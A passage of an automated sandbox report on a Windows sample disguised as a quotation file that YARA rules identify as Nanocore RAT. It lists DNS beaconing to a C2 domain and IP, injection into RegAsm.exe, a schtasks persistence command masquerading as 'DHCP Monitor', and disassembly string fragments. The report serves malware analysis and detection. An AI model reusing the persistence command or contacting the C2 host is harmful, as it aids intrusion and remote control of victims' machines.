Nov 20, 2020 10:52:34.549232006 CET	52929	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:52:34.595470905 CET	53	52929	8.8.8.8	192.168.2.5
Nov 20, 2020 10:52:35.678245068 CET	64317	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:52:35.714148998 CET	53	64317	8.8.8.8	192.168.2.5
Nov 20, 2020 10:52:37.744891882 CET	61004	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:52:37.780716896 CET	53	61004	8.8.8.8	192.168.2.5
Nov 20, 2020 10:52:38.269572020 CET	56895	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:52:38.280118942 CET	62372	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:52:38.305378914 CET	53	56895	8.8.8.8	192.168.2.5
Nov 20, 2020 10:52:38.323765039 CET	53	62372	8.8.8.8	192.168.2.5
Nov 20, 2020 10:52:39.666395903 CET	61515	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:52:39.702186108 CET	53	61515	8.8.8.8	192.168.2.5
Nov 20, 2020 10:52:40.541301012 CET	56675	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:52:40.585426092 CET	53	56675	8.8.8.8	192.168.2.5
Nov 20, 2020 10:52:40.723639011 CET	57172	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:52:40.761017084 CET	53	57172	8.8.8.8	192.168.2.5
Nov 20, 2020 10:52:44.808027983 CET	55267	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:52:44.843740940 CET	53	55267	8.8.8.8	192.168.2.5
Nov 20, 2020 10:52:58.099848986 CET	50969	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:52:58.135505915 CET	53	50969	8.8.8.8	192.168.2.5
Nov 20, 2020 10:53:00.573663950 CET	64362	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:53:00.600734949 CET	53	64362	8.8.8.8	192.168.2.5
Nov 20, 2020 10:53:01.550841093 CET	54766	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:53:01.594623089 CET	53	54766	8.8.8.8	192.168.2.5
Nov 20, 2020 10:53:03.715306997 CET	61446	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:53:03.753169060 CET	53	61446	8.8.8.8	192.168.2.5
Nov 20, 2020 10:53:09.388045073 CET	57515	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:53:09.423793077 CET	53	57515	8.8.8.8	192.168.2.5
Nov 20, 2020 10:53:15.049813032 CET	58199	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:53:15.087260008 CET	53	58199	8.8.8.8	192.168.2.5
Nov 20, 2020 10:53:20.718812943 CET	65221	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:53:20.756669998 CET	53	65221	8.8.8.8	192.168.2.5
Nov 20, 2020 10:53:26.427288055 CET	61573	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:53:26.463021040 CET	53	61573	8.8.8.8	192.168.2.5
Nov 20, 2020 10:53:32.515227079 CET	56562	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:53:32.550981045 CET	53	56562	8.8.8.8	192.168.2.5
Nov 20, 2020 10:53:38.155330896 CET	53591	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:53:38.190993071 CET	53	53591	8.8.8.8	192.168.2.5
Nov 20, 2020 10:53:43.952354908 CET	59688	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:53:43.990181923 CET	53	59688	8.8.8.8	192.168.2.5
Nov 20, 2020 10:53:49.701139927 CET	56032	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:53:49.736870050 CET	53	56032	8.8.8.8	192.168.2.5
Nov 20, 2020 10:53:55.361381054 CET	61150	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:53:55.396862030 CET	53	61150	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 20, 2020 10:52:02.374857903 CET	192.168.2.5	8.8.8.8	0xc3a3	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 10:52:07.995281935 CET	192.168.2.5	8.8.8.8	0x1d8b	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 10:52:13.445796967 CET	192.168.2.5	8.8.8.8	0xc2aa	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 10:52:18.668350935 CET	192.168.2.5	8.8.8.8	0xd980	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 10:52:23.822185040 CET	192.168.2.5	8.8.8.8	0x638b	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 10:52:28.992866993 CET	192.168.2.5	8.8.8.8	0x7c40	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 10:52:34.332396984 CET	192.168.2.5	8.8.8.8	0x62fa	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 10:52:39.666395903 CET	192.168.2.5	8.8.8.8	0x6f9f	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 10:52:40.541301012 CET	192.168.2.5	8.8.8.8	0xb80a	Standard query (0)	g.msn.com	A (IP address)	IN (0x0001)
Nov 20, 2020 10:52:44.808027983 CET	192.168.2.5	8.8.8.8	0x89cd	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 10:52:58.099848986 CET	192.168.2.5	8.8.8.8	0xb049	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 10:53:03.715306997 CET	192.168.2.5	8.8.8.8	0xab7c	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 10:53:09.388045073 CET	192.168.2.5	8.8.8.8	0x963b	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 10:53:15.049813032 CET	192.168.2.5	8.8.8.8	0x78b1	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 10:53:20.718812943 CET	192.168.2.5	8.8.8.8	0x9c6b	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 10:53:26.427288055 CET	192.168.2.5	8.8.8.8	0xbcfc	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 10:53:32.515227079 CET	192.168.2.5	8.8.8.8	0xa06b	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 10:53:38.155330896 CET	192.168.2.5	8.8.8.8	0xa01	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 10:53:43.952354908 CET	192.168.2.5	8.8.8.8	0x91fe	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 10:53:49.701139927 CET	192.168.2.5	8.8.8.8	0x4484	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 10:53:55.361381054 CET	192.168.2.5	8.8.8.8	0x3fce	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 20, 2020 10:52:02.412364006 CET	8.8.8.8	192.168.2.5	0xc3a3	No error (0)	kengeorge.zapto.org		194.5.97.9	A (IP address)	IN (0x0001)
Nov 20, 2020 10:52:08.032438040 CET	8.8.8.8	192.168.2.5	0x1d8b	No error (0)	kengeorge.zapto.org		194.5.97.9	A (IP address)	IN (0x0001)
Nov 20, 2020 10:52:13.483804941 CET	8.8.8.8	192.168.2.5	0xc2aa	No error (0)	kengeorge.zapto.org		194.5.97.9	A (IP address)	IN (0x0001)
Nov 20, 2020 10:52:18.703979015 CET	8.8.8.8	192.168.2.5	0xd980	No error (0)	kengeorge.zapto.org		194.5.97.9	A (IP address)	IN (0x0001)
Nov 20, 2020 10:52:23.857530117 CET	8.8.8.8	192.168.2.5	0x638b	No error (0)	kengeorge.zapto.org		194.5.97.9	A (IP address)	IN (0x0001)
Nov 20, 2020 10:52:29.028661966 CET	8.8.8.8	192.168.2.5	0x7c40	No error (0)	kengeorge.zapto.org		194.5.97.9	A (IP address)	IN (0x0001)
Nov 20, 2020 10:52:34.368335009 CET	8.8.8.8	192.168.2.5	0x62fa	No error (0)	kengeorge.zapto.org		194.5.97.9	A (IP address)	IN (0x0001)
Nov 20, 2020 10:52:39.702186108 CET	8.8.8.8	192.168.2.5	0x6f9f	No error (0)	kengeorge.zapto.org		194.5.97.9	A (IP address)	IN (0x0001)
Nov 20, 2020 10:52:40.585426092 CET	8.8.8.8	192.168.2.5	0xb80a	No error (0)	g.msn.com	g-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)
Nov 20, 2020 10:52:44.843740940 CET	8.8.8.8	192.168.2.5	0x89cd	No error (0)	kengeorge.zapto.org		194.5.97.9	A (IP address)	IN (0x0001)
Nov 20, 2020 10:52:58.135505915 CET	8.8.8.8	192.168.2.5	0xb049	No error (0)	kengeorge.zapto.org		194.5.97.9	A (IP address)	IN (0x0001)
Nov 20, 2020 10:53:03.753169060 CET	8.8.8.8	192.168.2.5	0xab7c	No error (0)	kengeorge.zapto.org		194.5.97.9	A (IP address)	IN (0x0001)
Nov 20, 2020 10:53:09.423793077 CET	8.8.8.8	192.168.2.5	0x963b	No error (0)	kengeorge.zapto.org		194.5.97.9	A (IP address)	IN (0x0001)
Nov 20, 2020 10:53:15.087260008 CET	8.8.8.8	192.168.2.5	0x78b1	No error (0)	kengeorge.zapto.org		194.5.97.9	A (IP address)	IN (0x0001)
Nov 20, 2020 10:53:20.756669998 CET	8.8.8.8	192.168.2.5	0x9c6b	No error (0)	kengeorge.zapto.org		194.5.97.9	A (IP address)	IN (0x0001)
Nov 20, 2020 10:53:26.463021040 CET	8.8.8.8	192.168.2.5	0xbcfc	No error (0)	kengeorge.zapto.org		194.5.97.9	A (IP address)	IN (0x0001)
Nov 20, 2020 10:53:32.550981045 CET	8.8.8.8	192.168.2.5	0xa06b	No error (0)	kengeorge.zapto.org		194.5.97.9	A (IP address)	IN (0x0001)
Nov 20, 2020 10:53:38.190993071 CET	8.8.8.8	192.168.2.5	0xa01	No error (0)	kengeorge.zapto.org		194.5.97.9	A (IP address)	IN (0x0001)
Nov 20, 2020 10:53:43.990181923 CET	8.8.8.8	192.168.2.5	0x91fe	No error (0)	kengeorge.zapto.org		194.5.97.9	A (IP address)	IN (0x0001)
Nov 20, 2020 10:53:49.736870050 CET	8.8.8.8	192.168.2.5	0x4484	No error (0)	kengeorge.zapto.org		194.5.97.9	A (IP address)	IN (0x0001)
Nov 20, 2020 10:53:55.396862030 CET	8.8.8.8	192.168.2.5	0x3fce	No error (0)	kengeorge.zapto.org		194.5.97.9	A (IP address)	IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Quotation ATB-PR28500KINH.exe PID: 6620 Parent PID: 5672

General

Start time:	10:51:43
Start date:	20/11/2020
Path:	C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe'
Imagebase:	0xf90000
File size:	1020928 bytes
MD5 hash:	5A6B8A02021146DBE686B9A5EB628D9A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.512937029.00000000059E2000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.512937029.00000000059E2000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000002.512937029.00000000059E2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.511212576.0000000004381000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.511212576.0000000004381000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000002.511212576.0000000004381000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.513612076.0000000005D3C000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.513612076.0000000005D3C000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000002.513612076.0000000005D3C000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Analysis Process: RegAsm.exe PID: 6880 Parent PID: 6620

General

Start time:	10:51:54
Start date:	20/11/2020
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Imagebase:	0x150000
File size:	64616 bytes
MD5 hash:	6FD7592411112729BF6B1F2F6C34899F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: RegAsm.exe PID: 6916 Parent PID: 6620

General

Start time:	10:51:55
Start date:	20/11/2020
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Imagebase:	0xf50000
File size:	64616 bytes
MD5 hash:	6FD7592411112729BF6B1F2F6C34899F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.511598900.0000000004299000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000004.00000002.511598900.0000000004299000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.514616448.00000000068A0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.514616448.00000000068A0000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.514616448.00000000068A0000.00000004.00000001.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.504689843.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.504689843.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000004.00000002.504689843.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.513526465.0000000005940000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.513526465.0000000005940000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.507695159.0000000003291000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: Quotation ATB-PR28500KINH.exe PID: 6988 Parent PID: 6620

General

Start time:	10:51:56
Start date:	20/11/2020
Path:	C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe'
Imagebase:	0xc50000
File size:	1020928 bytes
MD5 hash:	5A6B8A02021146DBE686B9A5EB628D9A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.511416569.0000000003FF1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.511416569.0000000003FF1000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000002.511416569.0000000003FF1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.517841818.0000000005A82000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.517841818.0000000005A82000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000002.517841818.0000000005A82000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.506085283.0000000001233000.00000004.00000020.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.506085283.0000000001233000.00000004.00000020.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000002.506085283.0000000001233000.00000004.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 7012 Parent PID: 6916

General

Start time:	10:51:56
Start date:	20/11/2020
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp21A1.tmp'
Imagebase:	0xb50000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 7036 Parent PID: 7012

General

Start time:	10:51:57
Start date:	20/11/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: RegAsm.exe PID: 7088 Parent PID: 904

General

Start time:	10:51:57
Start date:	20/11/2020
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 0
Imagebase:	0x7ff797770000
File size:	64616 bytes
MD5 hash:	6FD7592411112729BF6B1F2F6C34899F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 7132 Parent PID: 7088

General

Start time:	10:51:58
Start date:	20/11/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: RegAsm.exe PID: 7048 Parent PID: 6988

General

Start time:	10:52:11
Start date:	20/11/2020
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Imagebase:	0xc50000
File size:	64616 bytes
MD5 hash:	6FD7592411112729BF6B1F2F6C34899F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000012.00000002.315767298.0000000002F81000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000012.00000002.315767298.0000000002F81000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000012.00000002.315860307.0000000003F89000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000012.00000002.315860307.0000000003F89000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000012.00000002.315053355.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000012.00000002.315053355.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000012.00000002.315053355.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Quotation ATB-PR28500KINH.exe PID: 6620 Parent PID: 5672 Quotation ATB-PR28500KINH.exeCOMMON

Executed Functions

Function 059C01CB, Relevance: 517.4, Strings: 413, Instructions: 1134COMMON

Download Yara Rule

Strings

ll, xrefs: 059C03DD
.dll, xrefs: 059C04DA
mInf, xrefs: 059C0377
ion, xrefs: 059C0E8E
n, xrefs: 059C0EB6
ombs, xrefs: 059C1096
Key, xrefs: 059C0627
age, xrefs: 059C1196
NtQu, xrefs: 059C0609
on, xrefs: 059C0A9A
ctio, xrefs: 059C0EAC
W, xrefs: 059C0B0D
lstr, xrefs: 059C085D
rThr, xrefs: 059C0D5C
le32, xrefs: 059C05BB
ad, xrefs: 059C0A63
ory, xrefs: 059C102C
eeVi, xrefs: 059C100E
tRel, xrefs: 059C07A6
py, xrefs: 059C1051
Inst, xrefs: 059C1238
eate, xrefs: 059C0AB3
tHas, xrefs: 059C06D8
n, xrefs: 059C0F33
cW, xrefs: 059C1169
User, xrefs: 059C0C65
ory, xrefs: 059C07F6
strlenuser32.dlladvapi32.dll, xrefs: 059C1348, 059C134B
\Kno, xrefs: 059C03AB
api3, xrefs: 059C0414
mati, xrefs: 059C033C
ll.d, xrefs: 059C03D3
ls\n, xrefs: 059C04C6
etCu, xrefs: 059C0EC9
wnDl, xrefs: 059C0480
texW, xrefs: 059C1360
NtOp, xrefs: 059C02F7
ue, xrefs: 059C0D2F
lMem, xrefs: 059C02E3
oces, xrefs: 059C08F0
y, xrefs: 059C0600
wnDl, xrefs: 059C04F4
oces, xrefs: 059C0D84
ll, xrefs: 059C0F91
tStr, xrefs: 059C0AF9
orma, xrefs: 059C0C47
wnDl, xrefs: 059C125C
et, xrefs: 059C0C9D
mati, xrefs: 059C0B6B
wnDl, xrefs: 059C043B
enPr, xrefs: 059C0D7A
Cont, xrefs: 059C068C
ePro, xrefs: 059C0DF7
Regi, xrefs: 059C111E
ansa, xrefs: 059C0F1F
wPro, xrefs: 059C115F
\Kno, xrefs: 059C03EC
Cryp, xrefs: 059C0722
NtDe, xrefs: 059C0CA6
tTra, xrefs: 059C0EDD
sTok, xrefs: 059C0D8E
oxA, xrefs: 059C0FCD
extW, xrefs: 059C0696
NtCr, xrefs: 059C0AA9
NtMa, xrefs: 059C0A72
eate, xrefs: 059C0C05
ckTr, xrefs: 059C0F15
Size, xrefs: 059C0228
irtu, xrefs: 059C097B
\Kno, xrefs: 059C059D
tCon, xrefs: 059C0A45
mapV, xrefs: 059C09A9
mbstowcs, xrefs: 059C1371, 059C1374
ry, xrefs: 059C08A9
Thre, xrefs: 059C0D01
wnDl, xrefs: 059C05A7
ddre, xrefs: 059C0F64
nsac, xrefs: 059C0EE7
tCre, xrefs: 059C06B0
NtCo, xrefs: 059C0D1B
rypt, xrefs: 059C0764
tePr, xrefs: 059C08E6
tion, xrefs: 059C02AB
hDat, xrefs: 059C06E2
Muta, xrefs: 059C12C4
File, xrefs: 059C0C0F
tAcq, xrefs: 059C0678
urce, xrefs: 059C01F1
rtua, xrefs: 059C07E2
RtlC, xrefs: 059C0D3E
ateK, xrefs: 059C0645
tVir, xrefs: 059C088B
emor, xrefs: 059C091D
rtua, xrefs: 059C02D9
Cont, xrefs: 059C07BA
NtRe, xrefs: 059C09D7
dvap, xrefs: 059C0508
iveK, xrefs: 059C0709
ce, xrefs: 059C0246
tion, xrefs: 059C0CC4
eryS, xrefs: 059C10B0
loca, xrefs: 059C02C5
ess, xrefs: 059C1082
alMe, xrefs: 059C0985
Cryp, xrefs: 059C06A6
Crea, xrefs: 059C08DC
NtSe, xrefs: 059C0BD4
eA, xrefs: 059C0B3E
Hash, xrefs: 059C0740
xecu, xrefs: 059C0CBA
Expa, xrefs: 059C0AD1
reat, xrefs: 059C0D48
enMu, xrefs: 059C12E7
User, xrefs: 059C106E
nfor, xrefs: 059C0332
\ntd, xrefs: 059C03C9
erne, xrefs: 059C0544
\Kno, xrefs: 059C0562
adVi, xrefs: 059C07D8
tDes, xrefs: 059C072C
ZwCr, xrefs: 059C0E66
Ole3, xrefs: 059C1293
lenW, xrefs: 059C0867
oces, xrefs: 059C0350
sume, xrefs: 059C09E1
\Kno, xrefs: 059C04B2
RtlC, xrefs: 059C0DE3
troy, xrefs: 059C0736
nt, xrefs: 059C12CE
wnDl, xrefs: 059C056C
pVie, xrefs: 059C0A7C
Tran, xrefs: 059C0E7A
adFi, xrefs: 059C0B98
sour, xrefs: 059C023C
Thre, xrefs: 059C0A22
NtCr, xrefs: 059C12B0
eryS, xrefs: 059C0283
RtlZ, xrefs: 059C0909
llba, xrefs: 059C0F0B
a, xrefs: 059C06EC
NtPr, xrefs: 059C0877
NtCr, xrefs: 059C0BFB
ateP, xrefs: 059C0944
cess, xrefs: 059C0E01
NtOp, xrefs: 059C05EC
onPr, xrefs: 059C0346
\use, xrefs: 059C0494
ls32, xrefs: 059C048A
teMu, xrefs: 059C1356
lize, xrefs: 059C120B
NtGe, xrefs: 059C0A3B
ash, xrefs: 059C06C4
ease, xrefs: 059C07B0
ss, xrefs: 059C0958
ofRe, xrefs: 059C0232
ance, xrefs: 059C1242
eryV, xrefs: 059C0613
ion, xrefs: 059C0AC7
wcst, xrefs: 059C108C
fSec, xrefs: 059C09BD
NtOp, xrefs: 059C0E98
NtCl, xrefs: 059C1036
KERNEL32.DLL, xrefs: 059C1392, 059C1398
NtFr, xrefs: 059C1004
Free, xrefs: 059C08B8
RtlS, xrefs: 059C0EBF
kernel32.dll, xrefs: 059C137C, 059C137F
NtOp, xrefs: 059C0D70
nmen, xrefs: 059C0AEF
wnDl, xrefs: 059C04BC
tDer, xrefs: 059C06FF
eUse, xrefs: 059C0D52
IsWo, xrefs: 059C0FD7
ls\u, xrefs: 059C0576
ndow, xrefs: 059C110A
dll, xrefs: 059C04A8
Priv, xrefs: 059C0DBB
GetS, xrefs: 059C0363
en, xrefs: 059C0D98
text, xrefs: 059C0A4F
oces, xrefs: 059C030B
teWi, xrefs: 059C1100
o, xrefs: 059C0381
ecti, xrefs: 059C0A90
tual, xrefs: 059C0895
teVi, xrefs: 059C02CF
KeyP, xrefs: 059C0C6F
adEx, xrefs: 059C0D0B
tdll, xrefs: 059C04D0
ls32, xrefs: 059C0445
LdrG, xrefs: 059C0F3C
\Ole, xrefs: 059C1270
Cryp, xrefs: 059C0750
yste, xrefs: 059C036D
ad, xrefs: 059C0A2C
DefW, xrefs: 059C114B
on, xrefs: 059C10C4
Wind, xrefs: 059C10DD
roce, xrefs: 059C0FEB
Thre, xrefs: 059C09EB
otec, xrefs: 059C0881
RtlC, xrefs: 059C0E2E
ls\k, xrefs: 059C053A
CoCr, xrefs: 059C1224
ext, xrefs: 059C07C4
memc, xrefs: 059C065E
ZwRo, xrefs: 059C0F01
etPr, xrefs: 059C0F46
ageB, xrefs: 059C0FC3
odul, xrefs: 059C0B20
wnDl, xrefs: 059C03B5
i32., xrefs: 059C0512
Memo, xrefs: 059C089F
oced, xrefs: 059C0F50
CoIn, xrefs: 059C11F7
r32., xrefs: 059C049E
nfor, xrefs: 059C0B61
eate, xrefs: 059C122E
yste, xrefs: 059C028D
wnDl, xrefs: 059C03F6
rent, xrefs: 059C0C5B
Mess, xrefs: 059C118C
Proc, xrefs: 059C1078
32.d, xrefs: 059C127A
ken, xrefs: 059C0DD9
ntin, xrefs: 059C0D25
tCon, xrefs: 059C0A0E
2.dl, xrefs: 059C041E
oadD, xrefs: 059C0F87
l, xrefs: 059C0594
orma, xrefs: 059C02A1
cess, xrefs: 059C0E56
wOfS, xrefs: 059C0A86
ileg, xrefs: 059C0DC5
enSe, xrefs: 059C0EA2
.dll, xrefs: 059C0853
ll, xrefs: 059C1284
ile, xrefs: 059C0C33
roce, xrefs: 059C094E
Thre, xrefs: 059C0A59
tant, xrefs: 059C12F1
2.dl, xrefs: 059C0463
\Kno, xrefs: 059C0526
eFil, xrefs: 059C0B2A
\Kno, xrefs: 059C0476
